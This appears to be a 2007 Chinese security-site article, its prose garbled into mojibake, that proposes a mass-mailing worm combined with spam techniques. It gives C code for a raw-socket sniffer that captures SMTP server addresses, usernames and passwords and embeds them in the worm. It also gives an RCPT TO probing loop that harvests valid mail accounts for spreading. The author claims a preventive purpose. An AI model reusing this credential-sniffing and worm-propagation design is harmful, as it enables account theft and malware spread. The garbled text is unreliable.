Ê×Ò³ | Óʼþ×ÊѶ | ¼¼Êõ½Ì³Ì | ½â¾ö·½°¸ | ²úÆ·ÆÀ²â | ÓʼþÈ˲Š| Óʼþ²©¿Í | ÓʼþϵͳÂÛ̳ | Èí¼þÏÂÔØ | ÓʼþÖÜ¿¯ | ÈȵãרÌâ | ¹¤¾ß
ÍøÂç¼¼Êõ | ²Ù×÷ϵͳ | Óʼþϵͳ | ¿Í»§¶Ë | µç×ÓÓÊÏä | ·´À¬»øÓʼþ | Óʼþ°²È« | ÓʼþÓªÏú | ÒÆ¶¯µçÓÊ | ÓʼþÈí¼þÏÂÔØ | µç×ÓÊéÏÂÔØ

ÓʼþÍøÂ簲ȫ

ϵͳ°²È« | ÓʼþÈí¼þ©¶´ | °²È«»ù´¡ | Êý×ÖÇ©Ãû | ¹¥·À¼¼Êõ | ²¡¶¾¹«¸æ | ²¡¶¾²éɱ | ISA Server | ·À»ðǽ |
Ê×Ò³ > ÓʼþÍøÂ簲ȫ > °²È«»ù´¡ÖªÊ¶ > ÓʼþÈ䳿ÓëÀ¬»øÓʼþ¼¼ÊõµÄÈÚºÏ > ÕýÎÄ

ÓʼþÈ䳿ÓëÀ¬»øÓʼþ¼¼ÊõµÄÈÚºÏ

³ö´¦£ºÈüµÏÍøÍøÂ簲ȫÉçÇø ×÷Õߣºpkxp ʱ¼ä£º2007-1-4 15:59:00

±³¾°

²¡¶¾£¬DDOS£¬À¬»øÓʼþÒѾ­³ÉΪµ±½ñÍøÂ簲ȫµÄÈý´ó¼¼ÊõÄÑÌâ¡£·´À¬»øÓʼþÖ®ËùÒÔÈç´ËÀ§ÄÑ£¬ÊÇÒòΪ(E)SMTPЭÒé±¾ÉíµÄȱÏÝ¡£ÕýÈçDDOS£¬ÊÇÀûÓÃTCP/IPЭÒé¹ÌÓеÄȱÏÝÒ»Ñù¡£ÐèҪ˵Ã÷µÄÊÇ£¬ÓʼþÈä³æÎªÁË´«²¥×ÔÉí¶ø·¢Ë͵ÄÓʼþ£¬Ò²ÊôÓÚÀ¬»øÓʼþµÄÒ»ÖÖ¡£

2003Äê³öÏÖµÄSobigÈä³æÊ¹À¬»øÓʼþµÄÊýÁ¿´óΪÔö¼Ó£¬Ðí¶à°²È«×¨¼ÒÈÏΪSobigʹÓÃÁËÀ¬»øÓʼþ¼¼Êõ²¢Ô¤ÑÔ£ºÈ䳿¼¼ÊõºÍÀ¬»øÓʼþ¼¼ÊõµÄÈںϽ«ÊÇδÀ´µÄ·¢Õ¹Ç÷ÊÆ¡£Æäʵ£¬ÕâÖÖ˵·¨ËäÈ»ÕýÈ·µ«²»×¼È·£¬²»´í£¬Sobig·¢Ë͵ÄÓʼþȷʵÊôÓÚÀ¬»øÓʼþ£¬¿ÉÊÇI LOVE YOU£¬HappyTime²¡¶¾·¢Ë͵ÄÓʼþÓֺγ¢²»ÊÇ£¿Ö»²»¹ýSobig·¢ËÍÁ½·ÝÏàͬÓʼþµÄƵÂʸߣ¬ËùÒԽػñµÄ´«²¥ÊýÁ¿²ÅÌØ±ð´ó£¬µ«ÕæÕýµÄ¸ÐȾÊýÁ¿²¢²»´ó£¬SobigÔÚ¼¼ÊõÉϲ¢Î´²ÉÓÃÀ¬»øÓʼþ¼¼Êõ¡£

±¾ÎĽ«ÔÚ·ÖÎöÓʼþÈ䳿ºÍÀ¬»øÓʼþ¹Ø¼ü¼¼ÊõµÄ»ù´¡ÉÏ£¬Ìá³öÀûÓÃÀ¬»øÓʼþ¼¼Êõ´«²¥È䳿µÄ˼Ïë¡£µ±È»£¬Õâ²¢²»ÊÇΪÁË´«²¥È䳿£¬¶øÊÇΪÁ˸üºÃµÄÔ¤·ÀδÀ´¿ÉÄܳöÏÖµÄÕâÀàÈ䳿¡£±¾ÎļÙÉè¶ÁÕßÒѾ­¾ß±¸ÁË(E)SMTPЭÒ飬È䳿£¬À¬»øÓʼþ·½ÃæµÄ֪ʶ¡£

ÓʼþÈ䳿µÄ¾ÖÏÞÓë½â¾ö·½·¨

ÓʼþÈä³æÃæÁÙµÄ3¸öÖ÷ÒªÎÊÌ⣺һÊÇÓʼþµØÖ·ËѼ¯£¬¶þÊÇ·þÎñÆ÷µØÖ·À´Ô´£¬ÈýÊÇÈçºÎʹ¸½¼þ¾¡¿ÉÄÜ¶àµØ»ñµÃÖ´Ðлú»á¡£±¾ÎÄÖ»ÌÖÂÛǰÁ½µã£º

Ò». ÓʼþµØÖ·ËѼ¯

ÏÖÔÚÁ÷Ðв¢±»¹ã±»Ê¹ÓõÄËѼ¯·½Ê½ÓÐÁ½ÖÖ£º

´ÓwabÎļþ»ñµÃ

´Óregedit»ñµÃwabÎļþ·¾¶£¬È»ºó·ÖÎöÒÑÖª¸ñʽµÄwabÎļþ£¬¶ÁÈ¡ÆäÖеĵØÖ·¡£

´Ó*.ht£¬*.htm£¬*.html£¬*.txt£¬*.dbx£¬*.emlµÈÎļþ»ñµÃ

¿ÉÒÔ±éÀúInternetÁÙʱĿ¼»ò±éÀúÓ²ÅÌ£¬´ÓÉÏÊöÀ©Õ¹ÃûµÄÎļþÖÐѰÕÒµØÖ·¡£·½·¨ºÍÀ¬»øÓʼþËÑË÷htmlÒ³ÃæÀàËÆ£¬¶¼ÊÇѰÕÒmailtoºÍ@£¬×÷ΪºÏ·¨emailµØÖ·µÄ±êÖ¾¡£

µÚÒ»ÖÖ·½·¨ÊÕ¼¯µ½µÄµØÖ·¿ÉÐŶȱȽϸߣ¬µã»÷ÂÊÒ²»á±È½Ï¸ß£»µÚ¶þÖÖ·½·¨Èç¹ûµØÖ·Ñ¡ÔñËã·¨ÑϽ÷£¬ÄÇôÕÒµ½µÄµØÖ·»ù±¾É϶¼ÊǺϷ¨µÄEmailµØÖ·£¬µ«¿ÉÐŶȽϵ͡£Á½ÖÖ·½·¨ËѼ¯µ½µÄµØÖ·ÊýÁ¿¶¼Ï൱ÓÐÏÞ£¬³ÉΪÈ䳿´«²¥µÄÖÆÔ¼Ìõ¼þÖ®Ò»¡£ºóÎĽ«»áÌáµ½½â¾ö·½°¸¡£

¶þ.Óʼþ·þÎñÆ÷µØÖ·ºÍÕʺÅÃÜÂëµÄÀ´Ô´

µ±Ç°£¬¼¸ºõËùÓÐÈ䳿¶¼°ÑÒ»¸ö»ò¼¸¸ö·þÎñÆ÷µÄIPµØÖ·Ó²±àÂëÔÚÎļþÌåÄÚ£¬ÕâÑù£¬Ò»µ©Óʼþ·þÎñÆ÷²»¿ÉÓã¬Èä³æÒ²¾ÍÍ£Ö¹ÁË´«²¥¡£¶øÇÒ£¬ÓÉÓÚÍøÂ簲ȫ²ßÂÔµÄÏÞÖÆ£¬Ðí¶à¸ÐȾÈ䳿µÄÖ÷»ú¶¼ÎÞ·¨ºÍÕâЩָ¶¨µÄ·þÎñÆ÷Á¬½Ó£¬´Ó¶øÓ°ÏìÁËÈ䳿µÄ´«²¥ËÙ¶È¡£ÕâÀïÌá³öÒ»ÖÖÐµķ½·¨À´»ñµÃ´óÁ¿¿É¿¿µÄSMTP Server£¬ÕÊ»§£¬ÃÜÂëÐÅÏ¢¡£

ÔÚWin2000ƽ̨ÉÏ£¬ÎÒÃÇ¿ÉÒÔÀûÓÃWinSock 2µÄÌØÐÔ£¬ËüÔÊÐí³ÌÐòʹÓÃWSAIoctl()¸øÒ»¸öSOCK_RAWÀàÐ͵ÄSocketÉèÖÃSIO_RCVALLÊôÐÔ£¬ÕâÑù¸ÃSocket¾Í¿ÉÒÔÊÕµ½ËùÓо­¹ý±¾»úµÄÊý¾Ý£¬ÕâÊÇÒ»ÖÖÎÞÐè±àдÇý¶¯µÄ¼òÒ×Sniffer¡£

Ðí¶à´ÏÃ÷µÄ¶ÁÕßÒѾ­Ïëµ½ÏÂÒ»²½µÄ¹¤×÷ÁË£¬Êǵģ¬ÀûÓÃԭʼÌ×½Ó×Ö²¶°ü£¬Ô­ÔòÈçÏ£º

a.Ä¿µÄ¶Ë¿ÚµÈÓÚ25¡£
b.´ÓSYN°ü¿ªÊ¼¼Ç¼£¬ÕâÊǿͻ§¶ËºÍSMTP ServerÕýÔÚÁ¬½Ó¡£
c.¸ù¾ÝHELO»òEHLOÀ´ÅжϷþÎñÆ÷ÊÇ·ñÐèÒªÈÏÖ¤¡£
d.Èç¹ûÊÇEHLO£¬²¶»ñºóÐøµÄÓû§ÃûºÍÃÜÂë¡£
e.¸ù¾ÝMAIL FROM: µÃµ½·¢¼þÈË¡£
f.ÅׯúÈ䳿×ÔÉíÏò25¶Ë¿Ú·¢Ë͵ı¨ÎÄ¡£
g.Èç¹û²¶»ñµÄÊý¾Ý·¢Éú´íÎóµÄ´ÎÊý³¬¹ýÉÏÏÞ£¬Åׯúµ±Ç°µÄ·þÎñÆ÷£¬»Ö¸´µ½³õʼ״̬¡£

Ϊ·½±ãÆð¼û£¬¿ÉÒÔ¶¨ÒåSMTPSERVINFO½á¹¹ÌåÀ´±£´æ·þÎñÆ÷ÐÅÏ¢¡£

typedef struct tagSmtpServerInfo {
DWORD   dwCredit;     //´Ë·þÎñÆ÷ÐÅÏ¢µÄ¿ÉÐŶȣ¬¸ù¾Ý·¢ÐųɰÜÔö¼õ
  BOOL   bAuth;     //·þÎñÆ÷ÊÇ·ñÐèÒªÈÏÖ¤
in_addr   dwServerIP;   //Óʼþ·þÎñÆ÷µÄIP
char     szUserName[32];   //Óû§Ãû
char     szPassWord[32];   //¿ÚÁî
char     szMailFrom[32];   //·¢¼þÈË
} SMTPSERVINFO;

ÏÂÃæµÄCaptureThreadº¯ÊýÊDz¶°üỊ̈߳¬¹¤×÷·½Ê½ºÍÔ­ÔòÈçÉÏËùÊö£¬ÎªÁ˽ÚԼƪ·ù£¬½«³õʼ»¯ºÍÅжϳɹ¦µÄ´úÂëÊ¡ÂÔ¡£

DWORD WINAPI CaptureThread ( LPVOID p )
{
WSAIoctl(CaptureSocket, SIO_RCVALL, &lpvBuffer, ¡­ , NULL); //ÉèÖÃΪ²¶»ñËùÓб¨ÎÄ
while( TRUE )
{
memset( buf , 0 , sizeof(buf) ) ;
iRet = recv( CaptureSocket , buf , sizeof( buf ) , 0 ) ;
pIpHeader = (IPHEADER *)buf ;
if(IsExistIP(pIpHeader->destIP) || pIpHeader->dPort!=::htons(25)) //²»ÊÇÈ䳿×ÔÉíËù·¢
continue;
if((pIpHeader->th_flag & SYN) == SYN)   //ÊǺͷþÎñÆ÷¿ªÊ¼ÎÕÊÖÂð?
{
bNewUser = TRUE;         //ÓÖÓÐÐÂÓû§·¢ÐÅÁË,¿ªÊ¼¼Ç¼ 
iStatus=0;
dwFailCount=0;
}
if(bNewUser==FALSE)
continue;
pBuf= (char *)buf + sizeof(IPHEADER)+sizeof(TCPHEADER);
switch(iStatus)
{
case 0:                 //ÎÕÊÖ״̬
{
m_pSmtpServInfo = new SMTPSERVINFO;
m_pSmtpServInfo->dwCredit=3;//³õʼ¿ÉÐŶÈΪ3
  m_pSmtpServInfo->dwServerIP.S_un.S_addr =pIpHeader->destIP; //»ñµÃÁËip
  iStatus++;
break;
}
case 1:
{
if(::strstr(pBuf,"HELO"))   //ÄäÃûsmtp server
{
m_pSmtpServInfo->bAuth=FALSE;
        m_pSmtpServInfo->szUserName[0]=NULL;
m_pSmtpServInfo->szPassWord[0]=NULL;
iStatus=5;         //2(user),3(pass)Ìø¹ýÁË
}
if(::strstr(pBuf,"EHLO"))       //·þÎñÆ÷ÐèÒªÈÏÖ¤
{
m_pSmtpServInfo->bAuth=TRUE;
  iStatus=2;   //×¼±¸²¶×½Óû§ÃûºÍÃÜÂë
}
break;
}
case 2:             //¿ªÊ¼ÊÕ²ØÕÊ»§ºÍÃÜÂë
{
if(::strstr(pBuf,"AUTH"))
iStatus=3;
break;
}
case 3:
{
lstrcpyn(m_pSmtpServInfo->szUserName,pBuf,::strstr(pBuf,"\r\n")-pBuf+1);
iStatus=4;
break;
}
case 4:
{       ::lstrcpyn(m_pSmtpServInfo->szPassWord,pBuf,::strstr(pBuf,"\r\n")-pBuf+1);   iStatus=5;
  break;
}
case 5:
  {
¡­
  ::lstrcpyn(m_pSmtpServInfo->szMailFrom,¡­);
  PostThreadMessage(::gMainThread,¡­, m_pSmtpServInfo); //֪ͨÖ÷Ïß³Ì
bNewUser=FALSE;       //²»±ØÔÙ²¶×½25°üÁË£¬³ý·ÇÓÐеÄÎÕÊÖÐÅÏ¢
iStatus=0;           //»Ö¸´Îª³õʼ״̬¡£
¡­

Ö÷Ï̸߳ºÔ𽫴˷þÎñÆ÷ÐÅϢдÈ벡¶¾Ì壬²¢¶Ô²¡¶¾ÌåÖØÐ±àÂ룬ʹµÃÔٴη¢Ë͵ĸ½¼þ°üº¬×îÐÂÐÅÏ¢¡£Í¬Ê±£¬Ö÷Ï̻߳¹»áÆô¶¯Ò»¸öеÄÓʼþµØÖ·Ì½²âỊ̈߳¬Á¬½Ó´Ë·þÎñÆ÷£¬»ñµÃ¾¡Á¿¶àµÄ´Ë·þÎñÆ÷µÄÕÊ»§²¢ÏòÆä·¢ËÍ×ÔÉí¡£ÈçºÎ»ñµÃÕÊ»§½«ÔÚÏÂÎÄ˵Ã÷¡£

ÖÁ´Ë£¬ÎÒÃÇÍê³ÉÁËÓʼþ·þÎñÆ÷ºÍÕÊ»§ÐÅÏ¢µÄ»ñÈ¡¹¤×÷£¬Èä³æÃ¿µ½Ò»´¦£¬¶¼»áËѼ¯×îеķþÎñÆ÷ÐÅÏ¢£¬ËѼ¯µ½µÄÐÅÏ¢»ù±¾¶¼ÊÇÍøÂç¿É´ïµÄ¡£ÒòÎªÉæ¼°µÄµ½·þÎñÆ÷ÊýÁ¿¼«¶à£¬·¶Î§¼«¹ã£¬ËùÒÔ·âɱ·þÎñÆ÷»òÕßÕÊ»§ÊDz»¿ÉÄܵģ¬ÕâЩ¶¼ÊÇSniffer²¶°ü»ñµÃ·þÎñÆ÷µÄÓÅÊÆËùÔÚ¡£

À¬»øÓʼþµÄ¹Ø¼ü¼¼Êõ

À¬»øÓʼþµÄÏêϸ¼¼Êõ²»ÔÚ±¾ÎÄÌÖÂÛ·¶Î§Ö®ÄÚ£¬µ«ÎªÁË˵Ã÷ÎÊÌ⣬±ØÐëÒªÓмòÒªµÄ˵Ã÷£¬Ò»°ãÀ´Ëµ£¬À¬»øÓʼþ±ØÐë½â¾öµÄÁ½¸öÎÊÌâÊÇ£º

1.·¢ËÍ·½Ê½µÄÑ¡Ôñ

ÀûÓÃSMTP ЭÒéÎÞÐëÈÏÖ¤µÄȱµã

ÀûÓÃOpen Relay (¿ª·Åת·¢)

Open RelayÊÇÖ¸ÓÉÓÚÓʼþ·þÎñÆ÷²»Àí»áÓʼþ·¢ËÍÕß»òÓʼþ½ÓÊÜÕßµÄÊÇ·ñΪϵͳËùÉ趨µÄÓû§£¬¶ø¶ÔËùÓеÄÈëÕ¾ÓʼþÒ»ÂɽøÐÐת·¢£¨Relay£©µÄ¹¦ÄÜ¡£

ÌØ¿ìרµÝ·¨

ÌØ¿ìרµÝ¾ÍÊÇÀûÓñ¾»ú³äµ±·¢¼þ·þÎñÆ÷µÄ¹¦ÄÜ£¬ÓÉDNS½âÎö³öÊÕ¼þ·þÎñÆ÷µÄIPµØÖ·£¬È»ºó½«±¾»úÖ±½ÓÓëÊÕ¼þ·þÎñÆ÷µÄÏàÁ¬£¬½«ÓʼþÖ±½Ó·¢Ë͵½ÊÕ¼þÈ˵ÄÊÕ¼þ·þÎñÆ÷ÉÏ¡£FoxmailµÄ¡±ÌØ¿ìרµÝ¡±¾ÍÊÇÕâ¸öÔ­Àí¡£ÏÖÔÚ£¬ÌØ¿ìרµÝÒѾ­Öð½¥Ê§Ð§£¬°²È«¼¶±ð¸ßµÄSmtp Server²»ÔÊÐí·ÇSmtp ServerÖ±½Ó·¢ËÍ£¬±ÜÃâ±»SpammerÀûÓá£

×Ô½¨SMTP·þÎñÆ÷

Spammer×Ô¼º½¨Á¢SMTP·þÎñÆ÷£¬Ö±½ÓºÍÄ¿±ê·þÎñÆ÷Á¬½Ó£¬·¢ËÍÓʼþ¡£ÕâÖÖÇé¿ö²»ÐèÒªÄäÃû·þÎñÆ÷ºÍת·¢·þÎñÆ÷µÄ°ïÖú¡£Ä¿±ê·þÎñÆ÷ûÓÐÀíÓɾܾøÀ´×Ôһ̨Óʼþ·þÎñÆ÷µÄÇëÇó£¬ËùÒÔÔ­ÀíÉÏ×ÜÄܱ£Ö¤·¢Ðųɹ¦£¬È±µãÊDZØÐëÉêÇëÓòÃû£¬ÇÒ±ØÐëÆµ·±¸ü»»IPºÍÓòÃû£¬ÒòΪºÜ¿ì»á±»ÁÐÈëºÚÃûµ¥¡£

ÓÉÉϿɼû£¬À¬»øÓʼþµÄ·¢Ëͼ¼Êõ²»ÊʺÏÈä³æÊ¹Óã¬Ô­ÒòÊÇÀûÓÃÉÏÃæµÄ·½·¨£¬SpammerÖ»ÒªÕÒµ½Ò»¸öSMTP Server¾Í¿ÉÒÔ·¢ËÍÊýÒÔ°ÙÍò¼ÆµÄÓʼþÁË£¬Ò»¸öµØÖ·Ê§Ð§ºó¿ÉÒÔÈËΪµØ¸ü»»£¬¶øÈ䳿Ôò²»Í¬£¬±ØÐë×ÔÁ¦¸üÉú£¬ÈçÉÏËùÊöµÄSniffer¾ÍÊǽâ¾ö;¾¶¡£

2.ÓʼþµØÖ·µÄ»ñµÃ

VRFYÖ¸Áî

¸ÃÖ¸ÁîµÄ×÷ÓÃÊÇÑéÖ¤Ò»¸öÓû§ÊÇ·ñÊDZ¾µØÓû§£ºÊÇ£¬Ôò·µ»ØÍêÕûµÄµØÖ·;·ñ£¬Ôò¸ù¾ÝSMTPµÄÉèÖûØÓ¦¡£SpammerÀûÓÃÕâ¸öÃüÁîÅäºÏ×ÖµäÇî¾ÙÓû§ÃûÀ´ÊÕ¼¯ÓÐЧµÄÓʼþµØÖ·¡£ÔÚа汾µÄSMTPÈí¼þÖУ¬Õâ¸öÖ¸ÁîÒѱ»½ûÓ㬵«Î´È¡Ïû¡£

EXPNÖ¸Áî

¸ÃÖ¸ÁîÓÃÀ´Ïò·þÎñÆ÷²éѯÓʼþÁÐ±í£¬³É¹¦Ôò·µ»ØÁÐ±í£¬Ã¿ÐÐÒ»¸öµØÖ·¡£´ËÖ¸ÁîÔÚа汾µÄSMTPÈí¼þÖÐÒ²±»½ûÓá£

·ÖÎöÍøÒ³

Spammerͨ¹ýËÑË÷ÒýÇæÈçGoogle£¬YahooµÈ£¬»ñµÃurl£¬½«ÍøÒ³ÏÂÔØµ½±¾µØºó£¬Í¨¹ýÆ¥Å乨¼ü×Ö¡°mail to:¡±ºÍ¡°@¡±À´ÊÕ¼¯µØÖ·¡£ÕâÖÖ·½·¨Ó¦Óúܹ㷺£¬ÒòΪÓÐЧ²¢ÇÒÉÏÃæÁ½ÖÖ·½·¨ÒѲ»¿ÉÓᣵ«ÊÇÏÖÔÚÒѾ­ÓÐÓ¦¶Ô´ëÊ©£¬±ÈÈçÓôúÌæ@¡£

ÐéÄâ·¢ÐÅ·¨

Spammerͨ¹ýÕý¹æµÄ²½ÖèÁ¬½ÓSmtp Server£¬È»ºó·¢ËÍHELO(EHLO)£¬MAIL FROM³É¹¦ºó£¬ÔÙ·¢ËÍRcpt To : £¬Èç¹ûµÃµ½ÕýÈ·µÄ»ØÓ¦£¬ÔòÊÕ¼str£¬×öΪºÏ·¨µÄÓʼþµØÖ·£¬È»ºó¶ÁÈ¡ÏÂÒ»¸östr£¬ÔÙ´Î×öRcpt to³¢ÊÔ£¬Ö±µ½·¢Éú´íÎó»ò±éÀúÁËËùÓÐ×Ö·û´®ÎªÖ¹¡£ÕâÖÖ·½·¨µÄÓŵãÔÚÓÚ£¬ÔÚRcpt to֮ǰ·¢Ë͵ÄÃüÁî¶¼ÊǺÏÀíµÄ£¬ËùÓÐSMTP·þÎñÆ÷¶¼²»ÄܾܾøRcpt To£¬ÕýÈçËùÓÐWeb Server¶¼²»ÄܾܾøSYN°üÒ»Ñù¡£

¹Ø¼ü¾ÍÔÚÓÚ´ËÁË£¬Ç°ÃæÌáµ½ÓʼþÈ䳿ËѼ¯µØÖ·ÊýÁ¿µÄ¾ÖÏÞ£¬ÎÒÃÇ¿ÉÒÔ²ÉÓÃÐéÄâ·¢ÐÅ·¨À´½â¾ö¡£ÐÎÏóµØÃèÊöÈçÏ£º

¿Í»§£ºConnect(Smtp Server) 
·þÎñÆ÷£º220 smtp.263.net ESMTP £¬Á¬½Ó³É¹¦
¿Í»§£ºHELO localhost         EHLO localhost
·þÎñÆ÷£º250-smtp.263.net
      250-PIPELINING
¡­
250-AUTH LOGIN
¿Í»§£ºAUTH LOGIN\r\n
·þÎñÆ÷£º334¡­
¿Í»§£ºÓû§ÃûµÄbase64±àÂë
·þÎñÆ÷»ØËÍ£º334¡­
¿Í»§£ºÃÜÂëµÄbase64±àÂë
·þÎñÆ÷£º235 Authentication successful
¿Í»§£ºMAIL FROM: <username@263.net>\r\n
·þÎñÆ÷£º250 Ok
¿Í»§£ºRCPT TO: <str>\r\n
·þÎñÆ÷»ØËÍ:
&Oslash;250 £¬ strΪºÏ·¨ÕÊ»§¡£
&Oslash;550£¬ invalid user¡£
&Oslash;522£¬ too many rcpto¡£
¿Í»§£ºDATA\r\n 
¡­

ǰÎÄÒѾ­ÊµÏÖÁËÓÃSniffer·½·¨»ñµÃÓʼþ·þÎñÆ÷ºÍÕÊ»§ÐÅÏ¢£¬²¢ÓÉbAuth×ֶαêÖ¾ÊÇ·ñÐèÒªÈÏÖ¤¡£ÏÖÔھͿÉÒÔÀûÓÃSMTPSERVINFOÀ´Á¬½Ó·þÎñÆ÷£¬Ì½²âºÏ·¨ÕÊ»§ÁË¡£»¹ÓÐÒ»¸öÎÊÌ⣬¾ÍÊÇstrµÄÀ´Ô´£¬ÎÒÃÇÑ¡Ôñ´Ó±¾µØÎļþ»ñµÃµÄ·½·¨£¬Ô­ÔòÈçÏ£º

&Oslash;±éÀúÓ²ÅÌ£¬ËÑË÷ÒÔtxt£¬ht*£¬doc£¬eml£¬iniµÈΪÀ©Õ¹ÃûµÄÎļþ¡£
&Oslash;ÕÒµ½Ò»¸öword£¬¼ÓÈë m_WordListÁÐ±í¡£
&Oslash;°´ÕպϷ¨ÓʼþµØÖ·µÄ¹æÔò£¬ÕÒµ½Ò»¸öemail£¬¼ÓÈëm_EmailListÁÐ±í£¬·¢ËÍÓʼþÏ̻߳áÖ±½Ó
¶ÁÈ¡m_EmailListÁÐ±í²¢·¢ËÍÓʼþ¡£
&Oslash;ÓʼþµØÖ·Ì½²âÏß³Ì(EmailSpamer)¶ÁÈ¡m_WordListÁÐ±í£¬ÑéÖ¤ÊÇ·ñΪºÏ·¨ÕÊ»§£¬ÊÇÔò¼ÓÈë
µ½m_EmailLsit¡£
&Oslash;m_WordlistºÍm_EmailList¶¼Òª±£³ÖÒ»¶¨µÄÊýÁ¿ÇҼǼ»¥³â£¬ÒÔ¼õСÏòͬһE-MailµØÖ··¢ËÍ
¶à´ÎÓʼþµÄ¿ÉÄÜÐÔ¡£

ÏÖÔÚ»ñµÃÁË´óÁ¿µÄstr£¬¿ÉÒÔ¸ù¾Ý(E)SMTPЭÒé̽²âÁË£¬Ì½²âÏß³ÌEmailSpamerÈçÏ£º

while(TRUE)
{
m_Smtp.TalkWithSmtpServer();
do
{
int iRet = m_Smtp.SendRcptTo(szRcptTo); //szRcptToÀ´×Ôm_WordList
if(iRet==250)       //´ú±í³É¹¦£¬È·ÊµÓÐÕâ¸öÕÊ»§
  ::m_EMailList->Add(szRcptTo);
else if(iRet==550)       //ÕÊ»§´íÎó£¬ÐÝÃßÒ»»á£¬±ÜÃâ±»·â
Sleep(100);
else           //´íÎ󣬶ϿªÁ¬½Ó£¬ÖØÐÂ̽²â
break;
}while(::m_WordList->GetCount());
¡­

ÖÁ´Ë£¬ÎÒÃǵÄ˼·ÒѾ­Ê®·ÖÇåÎú£º

È䳿ÔËÐкó£¬Ê×ÏÈÆô¶¯Îļþ±éÀúỊ̈߳¬´ÓÎļþÖлñµÃ´óÁ¿µÄµ¥´Ê£¬¼ÓÈëm_WordList£¬Í¬Ê±°Ñ´ÓÎļþÖлñµÃµÄÓʼþµØÖ·¼ÓÈëm_EmailList¡£µØÖ·Ì½²âÏß³ÌÏÈÀûÓò¡¶¾ÌåÄÚÒÑÓеķþÎñÆ÷ÐÅÏ¢¿ªÊ¼Ì½²â£¬µ¥´ÊÈ¡×Ôm_WordList£¬ ¶ÔÓÚÑéÖ¤³É¹¦µÄword£¬½«´Ëword+·þÎñÆ÷ÓòÃû¹¹³Éword@xxx.yyyµÄÐÎʽºó¼ÓÈëm_EmailList¡£·¢ËÍÓʼþÏ̲߳»¶Ï¶ÁÈ¡m_EmailList·¢ËÍÓʼþ¡£ ¼àÌýÏ̲߳¶»ñ²¢·ÖÎöÍøÂ籨ÎÄ£¬²¹³äеķþÎñÆ÷×ÊÔ´£¬²¢Ð´È벡¶¾Ìå¡£ÕâÑù£¬Ô´Ô´²»¶ÏµÄÓʼþµØÖ·¾Í»áÓ¦½Ó²»Ï¾£¬È䳿µÃÒÔ´óÃæ»ýÀ©É¢¡£

ÐèҪ˵Ã÷µÄÊÇ£¬´óµÄÓʼþ·þÎñÌṩÉÌͨ³£ÓкõÄanti-spamÌØÐÔ£¬Èç¹ûrcpt to´íÎó´ÎÊý´ïµ½Ò»¸öÉÏÏÞ£¬ÄÇô´ËÕÊ»§¾Í»á±»Í£ÓÃÒ»¶Îʱ¼ä¡£µ«ÊÇ£¬¹æÄ£Ô½´ó£¬×¢²áµÄÕÊ»§Ò²¾ÍÔ½¶à£¬Ëæ»úÕÒ¸öµ¥´Ê£¬»ù±¾É϶¼ÊǺϷ¨ÕÊ»§¡£¶ÔÓÚСÐ͵ÄÓʼþ·þÎñÌṩÕߣ¬°²È«ÐԺܲ¶Ôrcpt to´ÎÊý¸ù±¾Ã»ÓÐÏÞÖÆ¡£¹é¸ù½áµ×£¬²»¹Ü±»·âÓë·ñ£¬ÔÚ´Ë֮ǰ¶¼ÒѾ­·¢ÏÖÁËÊýÄ¿¿É¹ÛµÄÓʼþµØÖ·£¬²¢ÏòÕâЩµØÖ··¢ËÍÁËÈ䳿¡£

½áÊøÓï

ÍøÂ簲ȫµÄÎÊÌâÖ»Óе±ËùÓеļÆËã»úÓû§¶¼³ÉΪ°²È«×¨¼Òʱ²ÅÓпÉÄܵõ½³¹µ×½â¾ö£¬ÊÂʵÉÏ£¬ÕâÊDz»¿ÉÄܵ쬶øÇÒÎÒÃÇÒ²²»ÄÜÒÀÀµ»òµÈ´ýÈ«Ãñ¼ÆËã»úˮƽµÄÌá¸ß¡£Ä¿Ç°¿ÉÒÔ×öµÄ£¬²¢ÇÒ¸÷¹úÒ»Ö±ÔÚŬÁ¦×öµÄ£¬¾ÍÊǼӿ췴À¬»øÓʼþµÄÁ¢·¨ºÍ¹æ·¶ÓʼþÌṩÉ̵ķþÎñ¡£Öйú·´À¬»øÓʼþЭ»á½ñÄê²ÉÈ¡ÁËһϵÁÐÓÐÁ¦´ëÊ©£¬°üÀ¨Á½´Î¹«²¼À¬»øÓʼþ·þÎñÆ÷ºÚÃûµ¥£¬Öƶ¨Óʼþ·þÎñ¹æ·¶£¬Íƶ¯À¬»øÓʼþÁ¢·¨µÈ£¬ÕâЩËä²»ÄÜÍêÈ«¶ôÖÆÈÚºÏÀ¬»øÓʼþ¼¼ÊõµÄÈ䳿£¬µ«¾ßÓÐÒ»¶¨µÄÖÆÔ¼Ð§¹û¡£

Ïà¹ØÎÄÕ ÈÈÃÅÎÄÕÂ
  • ÃÀ´óѧÉúÇÖÈëÅåÁÖÖݳ¤¸öÈËÓʼþÕË»§±»´þ²¶
  • ˼¿ÆIronPort·¢²¼Ðµç×ÓÓʼþ°²È«É豸
  • ¹È¸èÌṩµÄµç×ÓÓʼþ´æµµÊ±¼äÑÓ³¤ÎªÊ®Äê
  • 9ÔÂÀ¬»øÓʼþ×ÜÁ¿¼õÉÙ ÓëISPµ¹±ÕÓйØ
  • À¬»øÓʼþ·¢Õ¹µÄËÄ´óÇ÷ÊÆ
  • º«¹úÒéÔ±³ÆÖйúºÚ¿Íð³äÇàÍß̨·¢ËͲ¡¶¾Óʼþ
  • ÈüÃÅÌú¿ËÉý¼¶DLP²úÆ·¼°·´À¬»øÓʼþÍø¹Ø
  • FoxmailÓʼþ¿Í»§¶Ëmailto»º³åÇøÒç³ö©¶´
  • HotmailÌáʾ£ºÈçºÎ·À·¶µç×ÓÓʼþÆÛÕ©
  • ÈÃQQͬÑùÏÔʾFoxmailÐÂÓʼþ
  • 9Ô·Ý"È⼦"µçÄÔ·¢ËÍÀ¬»øÓʼþÊýÁ¿¼¤Ôö101%
  • ¿áÓÊÍÆ³öKoomail 5.1°æ ·¢Á¦ÆóÒµ¼¶ÓʼþÓ¦ÓÃ
  • ÇÉÃîÒþ²ØIPµØÖ·×öÍøÉÏ¡°ÒþÉí¡±ÈË
  • SYMANTEC NAV 9.0ÖÐÎÄÆóÒµ°æµÄ°²×°
  • Rapid Restore PC°²×°¼°Ê¹Óò½Öè
  • DoS ¾Ü¾ø·þÎñ¹¥»÷
  • ÈçºÎʵÏÖVPNʹÓÃÍÑÀëÄÚ²¿ÍøÂçµÄIPµØÖ·
  • ¹ØÓÚ¿¨°Í˹»ùʹÓõĸöÈ˾­Ñé×ÛºÏ
  • ³£Óö˿ڶÔÕÕÏê½â
  • Ãâ·Ñ¶Ë¿Ú¼à¿ØÈí¼þPort Reporter
  • ¿í´ø²¦ºÅÁ¬½ÓÃÜÂë»Ö¸´Ô­Àí
